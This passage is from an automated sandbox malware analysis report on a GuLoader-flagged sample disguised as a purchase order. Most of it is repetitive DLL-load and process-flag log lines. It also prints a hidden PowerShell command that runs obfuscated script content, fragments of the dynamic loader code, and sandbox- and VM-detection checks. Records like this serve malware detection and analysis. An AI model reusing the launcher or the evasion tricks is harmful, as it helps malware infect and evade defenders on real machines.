        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: msi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: PO Tournefortian2453525525235235623425523235.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008B92000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Sammentrykket.exe, Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdb0 source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb316567-2969588382-3778222414-1001_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000004.00000002.77583228848.000000000360D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.76792434686.000000000AF9D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Folkebaades $Statsraadssekretrens174 $Koruna), (talehandlinger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Rundstykkernes = [AppDomain]::CurrentDomain.
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Rebolt226)), $Extensometres).DefineDynamicModule($Elsk, $false).DefineType($Bssemagers61, $Unstigmatised, [System.MulticastDelegate])$
        Suspicious powershell command line found
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033C9367 push eax; ret 2_2_033C9381
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033C31BD push eax; retf 2_2_033C31E1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07A79B2F pushad ; ret 2_2_07A79B39
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeJump to dropped file
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeAPI/Special instruction interceptor: Address: 39C4C82
        Tries to detect Any.run
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES9A
        Source: powershell.exe, 00000002.00000002.76787212994.0000000007190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9884Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeWindow / User API: threadDelayed 2449Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeAPI coverage: 2.4 %
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe TID: 7432Thread sleep count: 2449 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeThread sleep count: Count: 2449 delay: -5Jump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_00406850 FindFirstFileW,FindClose,0_2_00406850
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C26
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
        Source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes9a
        Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
